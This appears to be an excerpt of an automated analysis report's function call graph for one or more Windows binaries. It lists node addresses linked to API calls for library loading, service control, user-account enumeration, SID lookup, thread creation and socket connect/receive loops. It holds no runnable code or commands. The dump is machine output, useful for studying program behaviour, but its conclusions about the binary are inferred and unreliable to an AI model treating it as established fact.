59857->59867 59860 7ff8ba501292 6 API calls 59858->59860 59861 7ff8ba501292 6 API calls 59859->59861 59863 7ff8ba501d9f 59860->59863 59861->59867 59862 7ff8ba501f95 59864 7ff8ba501292 6 API calls 59862->59864 59865 7ff8ba501dbc 59863->59865 59864->59865 59865->59694 59867->59862 59867->59863 59885 7ff8ba507731 59884->59885 59886 7ff8ba507769 59884->59886 59892 7ff8ba507409 59885->59892 59887 7ff8ba501292 6 API calls 59886->59887 59891 7ff8ba507748 59887->59891 59891->59808 59891->59810 59893 7ff8ba507421 59892->59893 59894 7ff8ba50743c 59892->59894 59896 7ff8ba507426 59893->59896 59897 7ff8ba50746f 59893->59897 59895 7ff8ba501292 6 API calls 59894->59895 59903 7ff8ba507465 59895->59903 59898 7ff8ba5074a2 59896->59898 59907 7ff8ba50742b 59896->59907 59899 7ff8ba501292 6 API calls 59897->59899 59900 7ff8ba501292 6 API calls 59898->59900 59899->59903 59900->59903 59901 7ff8ba50750c 59901->59903 59906 7ff8ba501292 6 API calls 59903->59906 59904 7ff8ba5074e1 strcmp 59904->59907 59908 7ff8ba507529 59906->59908 59907->59901 59907->59904 59908->59891 59927 7ff8ba50a02b 59926->59927 59928 7ff8ba50a002 LoadLibraryA 59926->59928 59929 7ff8ba50a02e GetLastError 59927->59929 59928->59929 59930 7ff8ba50a010 59928->59930 59932 7ff8ba501292 6 API calls 59929->59932 59931 7ff8ba501292 6 API calls 59930->59931 59933 7ff8ba503434 59931->59933 59932->59933 59970 7ff8b918146a 59969->59970 59971 7ff8b9181590 GetLastError 59969->59971 60094 7ff8b9181770 GetModuleHandleExA 59970->60094 59973 7ff8b9181292 6 API calls 59971->59973 59980 7ff8b9181569 59973->59980 59977 7ff8b91814a4 strlen 59978 7ff8b91814bd 59977->59978 59979 7ff8b91814d3 59977->59979 59978->59979 59983 7ff8b91814c2 strlen 59978->59983 59984 7ff8b91814f8 strlen fopen 59979->59984 59985 7ff8b91814d8 strcat strlen 59979->59985 59981 7ff8b9181292 6 API calls 59980->59981 59982 7ff8b9181586 59981->59982 59982->59706 59993 7ff8b9189004 59982->59993 59983->59979 59986 7ff8b918165d 59984->59986 59987 7ff8b9181547 59984->59987 59985->59984 59988 7ff8b9181292 6 API calls 59986->59988 60111 7ff8b9181292 59987->60111 59988->59980 59994 7ff8b9189026 59993->59994 59995 7ff8b9189069 59993->59995 60131 7ff8b9188c70 59994->60131 59996 7ff8b9181292 6 API calls 59995->59996 60001 7ff8b9188491 59996->60001 59999 7ff8b9189099 _errno _strtoui64 _errno 60000 7ff8b91890cc _errno 59999->60000 59999->60001 60002 7ff8b9181292 6 API calls 60000->60002 60001->59719 60003 7ff8b918e870 60001->60003 60002->60001 60173 7ff8b9181aa4 60003->60173 60039 7ff8b91849da OpenSCManagerA 60038->60039 60040 7ff8b9184a42 GetLastError 60038->60040 60041 7ff8b9184b1a GetLastError 60039->60041 60042 7ff8b9184a10 60039->60042 60043 7ff8b9181292 6 API calls 60040->60043 60046 7ff8b9181292 6 API calls 60041->60046 60044 7ff8b9184b36 60042->60044 60045 7ff8b9184a1d 60042->60045 60043->60045 60047 7ff8b9181292 6 API calls 60044->60047 60048 7ff8b9181292 6 API calls 60045->60048 60046->60044 60049 7ff8b9184a3a 60047->60049 60048->60049 60049->59719 60050 7ff8b918595e WSAStartup 60049->60050 60051 7ff8b918597a 60050->60051 60052 7ff8b91859a2 60050->60052 60053 7ff8b9181292 6 API calls 60051->60053 60054 7ff8b9181292 6 API calls 60052->60054 60095 7ff8b9181486 60094->60095 60096 7ff8b91817a2 GetLastError 60094->60096 60098 7ff8b918e0f1 60095->60098 60097 7ff8b9181292 6 API calls 60096->60097 60097->60095 60099 7ff8b918e102 60098->60099 60100 7ff8b918e138 60098->60100 60101 7ff8b918e107 60099->60101 60102 7ff8b918e168 60099->60102 60103 7ff8b9181292 6 API calls 60100->60103 60106 7ff8b918e110 60101->60106 60107 7ff8b918e198 60101->60107 60105 7ff8b9181292 6 API calls 60102->60105 60104 7ff8b918149a 60103->60104 60104->59977 60104->59980 60105->60104 60122 7ff8b918dfb2 8 API calls 60106->60122 60108 7ff8b9181292 6 API calls 60107->60108 60108->60104 60110 7ff8b918e115 60110->60104 60112 7ff8b91812a0 60111->60112 60123 7ff8b9190c10 60112->60123 60122->60110 60132 7ff8b9188c81 60131->60132 60133 7ff8b9188cb9 60131->60133 60139 7ff8b9188959 60132->60139 60135 7ff8b9181292 6 API calls 60133->60135 60138 7ff8b9188c98 60135->60138 60138->59999 60138->60001 60140 7ff8b9188971 60139->60140 60141 7ff8b918898c 60139->60141 60142 7ff8b9188976 60140->60142 60143 7ff8b91889bf 60140->60143 60144 7ff8b9181292 6 API calls 60141->60144 60145 7ff8b91889f2 60142->60145 60152 7ff8b918897b 60142->60152 60146 7ff8b9181292 6 API calls 60143->60146 60151 7ff8b91889b5 60144->60151 60147 7ff8b9181292 6 API calls 60145->60147 60146->60151 60147->60151 60148 7ff8b9188a5c 60148->60151 60149 7ff8b9188a31 strcmp 60149->60152 60154 7ff8b9181292 6 API calls 60151->60154 60152->60148 60152->60149 60174 7ff8b9181adb 60173->60174 60175 7ff8b9181ab2 LoadLibraryA 60173->60175 60176 7ff8b9181ade GetLastError 60174->60176 60175->60176 60177 7ff8b9181ac0 60175->60177 60179 7ff8b9181292 6 API calls 60176->60179 60178 7ff8b9181292 6 API calls 60177->60178 60180 7ff8b9181ad9 60178->60180 60179->60180 60217 7ff8bfb531aa 60216->60217 60218 7ff8bfb532d0 GetLastError 60216->60218 60321 7ff8bfb51e40 GetModuleHandleExA 60217->60321 60220 7ff8bfb52fd2 6 API calls 60218->60220 60228 7ff8bfb532a9 60220->60228 60224 7ff8bfb531e4 strlen 60226 7ff8bfb531fd 60224->60226 60227 7ff8bfb53213 60224->60227 60225 7ff8bfb52fd2 6 API calls 60239 7ff8bfb532c6 60225->60239 60226->60227 60229 7ff8bfb53202 strlen 60226->60229 60230 7ff8bfb53238 strlen fopen 60227->60230 60231 7ff8bfb53218 strcat strlen 60227->60231 60228->60225 60229->60227 60232 7ff8bfb5339d 60230->60232 60233 7ff8bfb53287 60230->60233 60231->60230 60234 7ff8bfb52fd2 6 API calls 60232->60234 60338 7ff8bfb52fd2 60233->60338 60234->60228 60239->59723 60240 7ff8bfb58ab4 60239->60240 60241 7ff8bfb58b19 60240->60241 60242 7ff8bfb58ad6 60240->60242 60243 7ff8bfb52fd2 6 API calls 60241->60243 60358 7ff8bfb58720 60242->60358 60245 7ff8bfb53501 60243->60245 60245->59724 60250 7ff8bfb54430 60245->60250 60247 7ff8bfb58b49 _errno _strtoui64 _errno 60247->60245 60248 7ff8bfb58b7c _errno 60247->60248 60249 7ff8bfb52fd2 6 API calls 60248->60249 60249->60245 60400 7ff8bfb52174 60250->60400 60286 7ff8bfb52f3a 60285->60286 60287 7ff8bfb52f62 60285->60287 60288 7ff8bfb52fd2 6 API calls 60286->60288 60289 7ff8bfb52fd2 6 API calls 60287->60289 60290 7ff8bfb52f54 60288->60290 60291 7ff8bfb52f7b 60289->60291 60290->59729 60292 7ff8bfb52fd2 6 API calls 60291->60292 60292->60290 60294 7ff8bfb53bc4 GetLastError 60293->60294 60295 7ff8bfb53b46 CreateThread 60293->60295 60297 7ff8bfb52fd2 6 API calls 60294->60297 60296 7ff8bfb53c9c GetLastError 60295->60296 60304 7ff8bfb53b92 60295->60304 60298 7ff8bfb52fd2 6 API calls 60296->60298 60303 7ff8bfb53b9f 60297->60303 60298->60304 60299 7ff8bfb53d95 60304->60299 60304->60303 60322 7ff8bfb51e68 60321->60322 60323 7ff8bfb51e72 GetLastError 60321->60323 60325 7ff8bfb57dd1 60322->60325 60324 7ff8bfb52fd2 6 API calls 60323->60324 60324->60322 60326 7ff8bfb57e18 60325->60326 60327 7ff8bfb57de2 60325->60327 60330 7ff8bfb52fd2 6 API calls 60326->60330 60328 7ff8bfb57e48 60327->60328 60329 7ff8bfb57de7 60327->60329 60333 7ff8bfb52fd2 6 API calls 60328->60333 60331 7ff8bfb57e78 60329->60331 60332 7ff8bfb57df0 60329->60332 60336 7ff8bfb531da 60330->60336 60334 7ff8bfb52fd2 6 API calls 60331->60334 60349 7ff8bfb57c92 8 API calls 60332->60349 60333->60336 60334->60336 60336->60224 60336->60228 60337 7ff8bfb57df5 60337->60336 60339 7ff8bfb52fe0 60338->60339 60350 7ff8bfb5d190 60339->60350 60349->60337 60351 7ff8bfb5d19e 60350->60351 60352 7ff8bfb5d1b5 60350->60352 60359 7ff8bfb58769 60358->60359 60360 7ff8bfb58731 60358->60360 60362 7ff8bfb52fd2 6 API calls 60359->60362 60366 7ff8bfb58409 60360->60366 60364 7ff8bfb58748 60362->60364 60364->60245 60364->60247 60367 7ff8bfb5843c 60366->60367 60368 7ff8bfb58421 60366->60368 60371 7ff8bfb52fd2 6 API calls 60367->60371 60369 7ff8bfb5846f 60368->60369 60370 7ff8bfb58426 60368->60370 60372 7ff8bfb52fd2 6 API calls 60369->60372 60373 7ff8bfb584a2 60370->60373 60380 7ff8bfb5842b 60370->60380 60376 7ff8bfb58465 60371->60376 60372->60376 60374 7ff8bfb52fd2 6 API calls 60373->60374 60374->60376 60375 7ff8bfb5850c 60375->60376 60379 7ff8bfb52fd2 6 API calls 60376->60379 60377 7ff8bfb584e1 strcmp 60377->60380 60380->60375 60380->60377 60401 7ff8bfb521ab 60400->60401 60402 7ff8bfb52182 LoadLibraryA 60400->60402 60403 7ff8bfb521ae GetLastError 60401->60403 60402->60403 60404 7ff8bfb52190 60402->60404 60405 7ff8bfb52fd2 6 API calls 60403->60405 60406 7ff8bfb52fd2 6 API calls 60404->60406 60444 7ff8b915146a 60443->60444 60445 7ff8b9151590 GetLastError 60443->60445 60556 7ff8b915cc60 GetModuleHandleExA 60444->60556 60447 7ff8b9151292 6 API calls 60445->60447 60452 7ff8b9151569 60447->60452 60451 7ff8b91514a4 strlen 60454 7ff8b91514bd 60451->60454 60455 7ff8b91514d3 60451->60455 60453 7ff8b9151292 6 API calls 60452->60453 60466 7ff8b9151586 60453->60466 60454->60455 60456 7ff8b91514c2 strlen 60454->60456 60457 7ff8b91514f8 strlen fopen 60455->60457 60458 7ff8b91514d8 strcat strlen 60455->60458 60456->60455 60459 7ff8b915165d 60457->60459 60460 7ff8b9151547 60457->60460 60458->60457 60462 7ff8b9151292 6 API calls 60459->60462 60573 7ff8b9151292 60460->60573 60462->60452 60466->59736 60467 7ff8b915c974 60466->60467 60468 7ff8b915c9d9 60467->60468 60469 7ff8b915c996 60467->60469 60471 7ff8b9151292 6 API calls 60468->60471 60593 7ff8b915c5e0 60469->60593 60476 7ff8b915be11 60471->60476 60473 7ff8b915ca09 _errno _strtoui64 _errno 60474 7ff8b915ca3c _errno 60473->60474 60473->60476 60475 7ff8b9151292 6 API calls 60474->60475 60475->60476 60476->59747 60477 7ff8b9159770 60476->60477 60635 7ff8b915cf94 60477->60635 60513 7ff8b9152dfa 60512->60513 60514 7ff8b9152e22 60512->60514 60515 7ff8b9151292 6 API calls 60513->60515 60516 7ff8b9151292 6 API calls 60514->60516 60517 7ff8b9152e14 60515->60517 60518 7ff8b9152e3b 60516->60518 60517->59747 60520 7ff8b9155a84 InitializeCriticalSectionAndSpinCount 60517->60520 60519 7ff8b9151292 6 API calls 60518->60519 60519->60517 60521 7ff8b9155a9f 60520->60521 60522 7ff8b9155ad4 GetLastError 60520->60522 60523 7ff8b9151292 6 API calls 60521->60523 60524 7ff8b9151292 6 API calls 60522->60524 60525 7ff8b9155ac7 60523->60525 60526 7ff8b9155af2 60524->60526 60525->59747 60557 7ff8b9151486 60556->60557 60558 7ff8b915cc92 GetLastError 60556->60558 60560 7ff8b9158ff1 60557->60560 60559 7ff8b9151292 6 API calls 60558->60559 60559->60557 60561 7ff8b9159038 60560->60561 60562 7ff8b9159002 60560->60562 60565 7ff8b9151292 6 API calls 60561->60565 60563 7ff8b9159068 60562->60563 60564 7ff8b9159007 60562->60564 60568 7ff8b9151292 6 API calls 60563->60568 60566 7ff8b9159098 60564->60566 60567 7ff8b9159010 60564->60567 60571 7ff8b915149a 60565->60571 60569 7ff8b9151292 6 API calls 60566->60569 60584 7ff8b9158eb2 8 API calls 60567->60584 60568->60571 60569->60571 60571->60451 60571->60452 60572 7ff8b9159015 60572->60571 60574 7ff8b91512a0 60573->60574 60585 7ff8b915f010 60574->60585 60584->60572 60586 7ff8b915f01e 60585->60586 60587 7ff8b915f035 60585->60587 60594 7ff8b915c629 60593->60594 60595 7ff8b915c5f1 60593->60595 60597 7ff8b9151292 6 API calls 60594->60597 60601 7ff8b915c2c9 60595->60601 60598 7ff8b915c608 60597->60598 60598->60473 60598->60476 60602 7ff8b915c2fc 60601->60602 60603 7ff8b915c2e1 60601->60603 60606 7ff8b9151292 6 API calls 60602->60606 60604 7ff8b915c32f 60603->60604 60605 7ff8b915c2e6 60603->60605 60608 7ff8b9151292 6 API calls 60604->60608 60607 7ff8b915c362 60605->60607 60615 7ff8b915c2eb 60605->60615 60611 7ff8b915c325 60606->60611 60609 7ff8b9151292 6 API calls 60607->60609 60608->60611 60609->60611 60610 7ff8b915c3cc 60610->60611 60613 7ff8b915c3d3 60610->60613 60614 7ff8b9151292 6 API calls 60611->60614 60612 7ff8b915c3a1 strcmp 60612->60615 60617 7ff8b915c3e9 60614->60617 60615->60610 60615->60612 60617->60598 60636 7ff8b915cfcb 60635->60636 60637 7ff8b915cfa2 LoadLibraryA 60635->60637 60638 7ff8b915cfce GetLastError 60636->60638 60637->60638 60639 7ff8b915cfb0 60637->60639 60641 7ff8b9151292 6 API calls 60638->60641 60640 7ff8b9151292 6 API calls 60639->60640 60679 7ff8bfaba500 GetLastError 60678->60679 60680 7ff8bfaba3da 60678->60680 60682 7ff8bfaba202 6 API calls 60679->60682 60786 7ff8bfab7140 GetModuleHandleExA 60680->60786 60690 7ff8bfaba4d9 60682->60690 60686 7ff8bfaba414 strlen 60687 7ff8bfaba443 60686->60687 60688 7ff8bfaba42d 60686->60688 60693 7ff8bfaba468 strlen fopen 60687->60693 60694 7ff8bfaba448 strcat strlen 60687->60694 60688->60687 60691 7ff8bfaba432 strlen 60688->60691 60689 7ff8bfaba202 6 API calls 60692 7ff8bfaba4f6 60689->60692 60690->60689 60691->60687 60692->59755 60702 7ff8bfab94f4 60692->60702 60695 7ff8bfaba4b7 60693->60695 60696 7ff8bfaba5cd 60693->60696 60694->60693 60698 7ff8bfaba202 6 API calls 60695->60698 60697 7ff8bfaba202 6 API calls 60696->60697 60697->60690 60699 7ff8bfaba4d1 60698->60699 60699->60690 60700 7ff8bfaba63d 60699->60700 60701 7ff8bfaba202 6 API calls 60700->60701 60701->60692 60703 7ff8bfab9516 60702->60703 60704 7ff8bfab9559 60702->60704 60804 7ff8bfab9160 60703->60804 60705 7ff8bfaba202 6 API calls 60704->60705 60707 7ff8bfab952f 60705->60707 60707->59758 60712 7ff8bfab2610 60707->60712 60709 7ff8bfab9589 _errno _strtoui64 _errno 60709->60707 60710 7ff8bfab95bc _errno 60709->60710 60711 7ff8bfaba202 6 API calls 60710->60711 60711->60707 60846 7ff8bfab7474 60712->60846 60748 7ff8bfab2012 60747->60748 60749 7ff8bfab1fea 60747->60749 60751 7ff8bfaba202 6 API calls 60748->60751 60750 7ff8bfaba202 6 API calls 60749->60750 60753 7ff8bfab2004 60750->60753 60752 7ff8bfab202b 60751->60752 60754 7ff8bfaba202 6 API calls 60752->60754 60753->59756 60754->60753 60756 7ff8bfab696a InitializeCriticalSectionAndSpinCount 60755->60756 60757 7ff8bfab6aec GetLastError 60755->60757 60758 7ff8bfab6997 60756->60758 60759 7ff8bfab6c08 GetLastError 60756->60759 60760 7ff8bfaba202 6 API calls 60757->60760 60761 7ff8bfab69ad CreateThread 60758->60761 60766 7ff8bfab6c26 60758->60766 60787 7ff8bfab7172 GetLastError 60786->60787 60788 7ff8bfab7168 60786->60788 60789 7ff8bfaba202 6 API calls 60787->60789 60790 7ff8bfab5fb1 60788->60790 60789->60788 60791 7ff8bfab5fc2 60790->60791 60792 7ff8bfab5ff8 60790->60792 60793 7ff8bfab5fc7 60791->60793 60794 7ff8bfab6028 60791->60794 60795 7ff8bfaba202 6 API calls 60792->60795 60797 7ff8bfab5fd0 60793->60797 60798 7ff8bfab6058 60793->60798 60796 7ff8bfaba202 6 API calls 60794->60796 60801 7ff8bfab5fdd 60795->60801 60796->60801 60803 7ff8bfab5e72 8 API calls 60797->60803 60799 7ff8bfaba202 6 API calls 60798->60799 60799->60801 60801->60686 60801->60690 60802 7ff8bfab5fd5 60802->60801 60803->60802 60805 7ff8bfab9171 60804->60805 60806 7ff8bfab91a9 60804->60806 60812 7ff8bfab8e49 60805->60812 60807 7ff8bfaba202 6 API calls 60806->60807 60809 7ff8bfab9188 60807->60809 60809->60707 60809->60709 60813 7ff8bfab8e61 60812->60813 60814 7ff8bfab8e7c 60812->60814 60815 7ff8bfab8e66 60813->60815 60816 7ff8bfab8eaf 60813->60816 60817 7ff8bfaba202 6 API calls 60814->60817 60818 7ff8bfab8ee2 60815->60818 60826 7ff8bfab8e6b 60815->60826 60819 7ff8bfaba202 6 API calls 60816->60819 60822 7ff8bfab8ea5 60817->60822 60820 7ff8bfaba202 6 API calls 60818->60820 60819->60822 60820->60822 60821 7ff8bfab8f4c 60821->60822 60824 7ff8bfab8f53 60821->60824 60825 7ff8bfaba202 6 API calls 60822->60825 60823 7ff8bfab8f21 strcmp 60823->60826 60828 7ff8bfab8f69 60825->60828 60826->60821 60826->60823 60828->60809 60847 7ff8bfab7482 LoadLibraryA 60846->60847 60848 7ff8bfab74ab 60846->60848 60849 7ff8bfab7490 60847->60849 60850 7ff8bfab74ae GetLastError 60847->60850 60848->60850 60852 7ff8bfaba202 6 API calls 60849->60852 60851 7ff8bfaba202 6 API calls 60850->60851 60853 7ff8bfab2624 60851->60853 60852->60853 60890 7ff8bfb8146a 60889->60890 60891 7ff8bfb81590 GetLastError 60889->60891 61005 7ff8bfb84170 GetModuleHandleExA 60890->61005 60892 7ff8bfb81292 19 API calls 60891->60892 60901 7ff8bfb81569 60892->60901 60897 7ff8bfb814a4 strlen 60899 7ff8bfb814bd 60897->60899 60900 7ff8bfb814d3 60897->60900 60898 7ff8bfb81292 19 API calls 60902 7ff8bfb81586 60898->60902 60899->60900 60903 7ff8bfb814c2 strlen 60899->60903 60904 7ff8bfb814f8 strlen fopen 60900->60904 60905 7ff8bfb814d8 strcat strlen 60900->60905 60901->60898 60902->59762 60913 7ff8bfb8ca74 60902->60913 60903->60900 60906 7ff8bfb8165d 60904->60906 60907 7ff8bfb81547 60904->60907 60905->60904 60909 7ff8bfb81292 19 API calls 60906->60909 60908 7ff8bfb81292 19 API calls 60907->60908 60910 7ff8bfb81561 60908->60910 60909->60901 60910->60901 60911 7ff8bfb816cd 60910->60911 60914 7ff8bfb8ca96 60913->60914 60915 7ff8bfb8cad9 60913->60915 61023 7ff8bfb8c6e0 60914->61023 60916 7ff8bfb81292 19 API calls 60915->60916 60922 7ff8bfb84587 60916->60922 60919 7ff8bfb8cb09 _errno _strtoui64 _errno 60920 7ff8bfb8cb3c _errno 60919->60920 60919->60922 60921 7ff8bfb81292 19 API calls 60920->60921 60921->60922 60922->59764 60923 7ff8bfb84bc0 60922->60923 61065 7ff8bfb844a4 60923->61065 60957 7ff8bfb824ca 60956->60957 60958 7ff8bfb824f2 60956->60958 60959 7ff8bfb81292 19 API calls 60957->60959 60960 7ff8bfb81292 19 API calls 60958->60960 60961 7ff8bfb824e4 60959->60961 60962 7ff8bfb8250b 60960->60962 60961->59768 60963 7ff8bfb81292 19 API calls 60962->60963 60963->60961 60965 7ff8bfb8a084 GetLastError 60964->60965 60966 7ff8bfb8a006 CreateThread 60964->60966 60967 7ff8bfb81292 19 API calls 60965->60967 60968 7ff8bfb8a052 60966->60968 60969 7ff8bfb8a15c GetLastError 60966->60969 60972 7ff8bfb8a05f 60967->60972 60971 7ff8bfb8a255 60968->60971 60968->60972 60970 7ff8bfb81292 19 API calls 60969->60970 60970->60972 61006 7ff8bfb81486 61005->61006 61007 7ff8bfb841a2 GetLastError 61005->61007 61009 7ff8bfb88571 61006->61009 61008 7ff8bfb81292 19 API calls 61007->61008 61008->61006 61010 7ff8bfb88582 61009->61010 61011 7ff8bfb885b8 61009->61011 61013 7ff8bfb88587 61010->61013 61014 7ff8bfb885e8 61010->61014 61012 7ff8bfb81292 19 API calls 61011->61012 61020 7ff8bfb8149a 61012->61020 61016 7ff8bfb88590 61013->61016 61017 7ff8bfb88618 61013->61017 61015 7ff8bfb81292 19 API calls 61014->61015 61015->61020 61022 7ff8bfb88432 21 API calls 61016->61022 61018 7ff8bfb81292 19 API calls 61017->61018 61018->61020 61020->60897 61020->60901 61021 7ff8bfb88595 61021->61020 61022->61021 61024 7ff8bfb8c6f1 61023->61024 61025 7ff8bfb8c729 61023->61025 61031 7ff8bfb8c3c9 61024->61031 61026 7ff8bfb81292 19 API calls 61025->61026 61030 7ff8bfb8c708 61026->61030 61030->60919 61030->60922 61032 7ff8bfb8c3e1 61031->61032 61033 7ff8bfb8c3fc 61031->61033 61034 7ff8bfb8c3e6 61032->61034 61035 7ff8bfb8c42f 61032->61035 61036 7ff8bfb81292 19 API calls 61033->61036 61038 7ff8bfb8c462 61034->61038 61045 7ff8bfb8c3eb 61034->61045 61037 7ff8bfb81292 19 API calls 61035->61037 61041 7ff8bfb8c425 61036->61041 61037->61041 61039 7ff8bfb81292 19 API calls 61038->61039 61039->61041 61040 7ff8bfb8c4cc 61040->61041 61044 7ff8bfb81292 19 API calls 61041->61044 61042 7ff8bfb8c4a1 strcmp 61042->61045 61045->61040 61045->61042 61066 7ff8bfb844db 61065->61066 61067 7ff8bfb844b2 LoadLibraryA 61065->61067 61068 7ff8bfb844de GetLastError 61066->61068 61067->61068 61069 7ff8bfb844c0 61067->61069 61070 7ff8bfb81292 19 API calls 61068->61070 61071 7ff8bfb81292 19 API calls 61069->61071 61072 7ff8bfb844d9 61070->61072 61071->61072 61203 7ff70887ab1e 61202->61203 61204 7ff70887ab35 61202->61204 61208 7ff70887bb4b fputc 61203->61208 61209 7ff70887bb4b fputc 61204->61209 61207 7ff708879a49 61207->59250 61207->59251 61207->59252 61208->61207 61209->61207 61210 7ff8b9153c88 61250 7ff8b91538c3 61210->61250 61211 7ff8b9153cd7 wcslen GetProcessHeap HeapAlloc 61211->61250 61212 7ff8b9153d97 NetApiBufferFree 61216 7ff8b9153d87 61212->61216 61213 7ff8b9153d48 GetProcessHeap HeapAlloc 61217 7ff8b9153d6c 61213->61217 61213->61250 61214 7ff8b9151292 6 API calls 61214->61250 61215 7ff8b9153ed7 61221 7ff8b9151292 6 API calls 61215->61221 61237 7ff8b9153ee0 61215->61237 61216->61212 61216->61215 61218 7ff8b9153dba NetUserEnum 61216->61218 61225 7ff8b9153e36 GetProcessHeap HeapAlloc 61216->61225 61219 7ff8b9151292 6 API calls 61217->61219 61217->61250 61218->61216 61219->61217 61220 7ff8b9154014 61223 7ff8b9151292 6 API calls 61220->61223 61221->61237 61222 7ff8b91538ee LocalAlloc 61222->61250 61229 7ff8b9153f0a 61223->61229 61226 7ff8b9153e70 61225->61226 61227 7ff8b91538a3 61225->61227 61231 7ff8b9153e7c memcpy GetProcessHeap HeapFree 61226->61231 61232 7ff8b9153eb5 61226->61232 61227->61216 61234 7ff8b9151292 6 API calls 61227->61234 61228 7ff8b915390d wcsncpy 61251 7ff8b915a05a 61228->61251 61231->61232 61234->61227 61235 7ff8b9151292 6 API calls 61235->61229 61237->61220 61238 7ff8b9153ee8 61237->61238 61254 7ff8b915379f 61238->61254 61239 7ff8b91539de GetLastError 61242 7ff8b9153a01 LocalAlloc 61239->61242 61239->61250 61240 7ff8b9153b84 ConvertSidToStringSidA 61245 7ff8b9153bd5 GetLastError 61240->61245 61240->61250 61241 7ff8b9153995 GetLastError 61244 7ff8b9151292 6 API calls 61241->61244 61243 7ff8b9153a1f LookupAccountNameW 61242->61243 61242->61250 61246 7ff8b9153a61 GetLastError 61243->61246 61247 7ff8b9153a53 LocalFree 61243->61247 61244->61250 61248 7ff8b9151292 6 API calls 61245->61248 61249 7ff8b9151292 6 API calls 61246->61249 61247->61250 61248->61250 61249->61250 61250->61211 61250->61213 61250->61214 61250->61216 61250->61222 61250->61228 61250->61240 61250->61241 61250->61247 61252 7ff8b915a082 wcslen 61251->61252 61253 7ff8b9153937 LookupAccountNameW 61251->61253 61252->61253 61253->61239 61253->61250 61255 7ff8b9153864 61254->61255 61256 7ff8b91537b2 61254->61256 61255->61229 61255->61235 61257 7ff8b9153841 61256->61257 61259 7ff8b91537e7 GetProcessHeap HeapFree 61256->61259 61260 7ff8b915380c GetProcessHeap HeapFree 61256->61260 61261 7ff8b9153831 LocalFree 61256->61261 61262 7ff8b9153839 LocalFree 61256->61262 61257->61255 61258 7ff8b915384d GetProcessHeap HeapFree 61257->61258 61258->61255 61259->61256 61260->61256 61261->61256 61262->61256 61263 7ff8b915184a 61272 7ff8b9151855 61263->61272 61264 7ff8b915195e 61265 7ff8b915196b 61264->61265 61330 7ff8b91522d5 10 API calls 61264->61330 61266 7ff8b915187d Sleep 61266->61272 61270 7ff8b9151932 Sleep 61270->61272 61271 7ff8b91522d5 10 API calls 61271->61272 61272->61264 61272->61266 61272->61270 61272->61271 61274 7ff8b915191e memcpy 61272->61274 61275 7ff8b915256c socket 61272->61275 61310 7ff8b9152a1a 61272->61310 61321 7ff8b9151780 61272->61321 61274->61272 61276 7ff8b915276b WSAGetLastError 61275->61276 61277 7ff8b91525a3 61275->61277 61280 7ff8b9151292 6 API calls 61276->61280 61278 7ff8b91525c5 61277->61278 61279 7ff8b91525a7 61277->61279 61283 7ff8b9152209 8 API calls 61278->61283 61331 7ff8b9152209 61279->61331 61282 7ff8b915278f 61280->61282 61285 7ff8b9152799 61282->61285 61286 7ff8b91525df 61282->61286 61287 7ff8b91525c3 61283->61287 61289 7ff8b9151292 6 API calls 61285->61289 61290 7ff8b9151292 6 API calls 61286->61290 61308 7ff8b91525d7 61287->61308 61344 7ff8b915233a setsockopt 61287->61344 61288 7ff8b915261e 61292 7ff8b9152623 htonl htons connect 61288->61292 61288->61308 61294 7ff8b9152600 61289->61294 61290->61294 61296 7ff8b915267c WSAGetLastError 61292->61296 61297 7ff8b9152661 61292->61297 61294->61272 61299 7ff8b915268d 61296->61299 61300 7ff8b915273e WSAGetLastError 61296->61300 61298 7ff8b9152209 8 API calls 61297->61298 61302 7ff8b915266e 61298->61302 61303 7ff8b9152695 select 61299->61303 61299->61308 61301 7ff8b9151292 6 API calls 61300->61301 61301->61308 61302->61282 61302->61308 61304 7ff8b91526f6 61303->61304 61305 7ff8b9152720 61303->61305 61304->61297 61306 7ff8b91526fc WSAGetLastError 61304->61306 61307 7ff8b9151292 6 API calls 61305->61307 61309 7ff8b9151292 6 API calls 61306->61309 61307->61308 61348 7ff8b91522d5 10 API calls 61308->61348 61309->61308 61311 7ff8b9152aa8 61310->61311 61312 7ff8b9152a34 61310->61312 61313 7ff8b9151292 6 API calls 61311->61313 61312->61311 61314 7ff8b9152a39 recv 61312->61314 61317 7ff8b9152a53 61313->61317 61315 7ff8b9152a5c WSAGetLastError 61314->61315 61316 7ff8b9152a4f 61314->61316 61315->61317 61318 7ff8b9152a70 61315->61318 61316->61317 61320 7ff8b9151292 6 API calls 61316->61320 61317->61272 61319 7ff8b9151292 6 API calls 61318->61319 61319->61317 61320->61317 61322 7ff8b9151798 61321->61322 61323 7ff8b9151842 61321->61323 61322->61323 61349 7ff8b915a000 61322->61349 61323->61272 61326 7ff8b9151834 LeaveCriticalSection 61326->61323 61327 7ff8b91517c8 61327->61326 61328 7ff8b9151292 6 API calls 61327->61328 61352 7ff8b915e342 61327->61352 61328->61327 61330->61265 61332 7ff8b9152219 ioctlsocket 61331->61332 61334 7ff8b915224d WSAGetLastError 61332->61334 61336 7ff8b915223c 61332->61336 61335 7ff8b9151292 6 API calls 61334->61335 61335->61336 61336->61288 61337 7ff8b9152154 setsockopt 61336->61337 61338 7ff8b9152189 setsockopt 61337->61338 61339 7ff8b91521e4 WSAGetLastError 61337->61339 61340 7ff8b91521bf WSAGetLastError 61338->61340 61341 7ff8b91521b5 61338->61341 61342 7ff8b9151292 6 API calls 61339->61342 61343 7ff8b9151292 6 API calls 61340->61343 61341->61287 61342->61341 61343->61341 61345 7ff8b9152377 61344->61345 61346 7ff8b9152381 WSAGetLastError 61344->61346 61345->61288 61347 7ff8b9151292 6 API calls 61346->61347 61347->61345 61348->61286 61350 7ff8b91517ab EnterCriticalSection 61349->61350 61351 7ff8b915a016 GetSystemTimeAsFileTime 61349->61351 61350->61327 61351->61350 61353 7ff8b915e3bc 61352->61353 61354 7ff8b915e372 61352->61354 61353->61327 61355 7ff8b915e4c7 61354->61355 61356 7ff8b915e380 61354->61356 61404 7ff8b915dc30 70 API calls 61355->61404 61357 7ff8b915e434 61356->61357 61358 7ff8b915e386 61356->61358 61363 7ff8b915e47c 61357->61363 61364 7ff8b915e43b 61357->61364 61360 7ff8b915e4d5 61358->61360 61361 7ff8b915e391 61358->61361 61406 7ff8b915e09c 56 API calls 61360->61406 61365 7ff8b915e3e6 61361->61365 61366 7ff8b915e393 61361->61366 61362 7ff8b915e40a 61362->61353 61367 7ff8b915e4c0 61363->61367 61368 7ff8b915e483 61363->61368 61364->61353 61401 7ff8b915d86e 57 API calls 61364->61401 61371 7ff8b915e4ce 61365->61371 61372 7ff8b915e3f1 61365->61372 61373 7ff8b915e3cb 61366->61373 61374 7ff8b915e39a 61366->61374 61403 7ff8b915d95d 52 API calls 61367->61403 61368->61353 61394 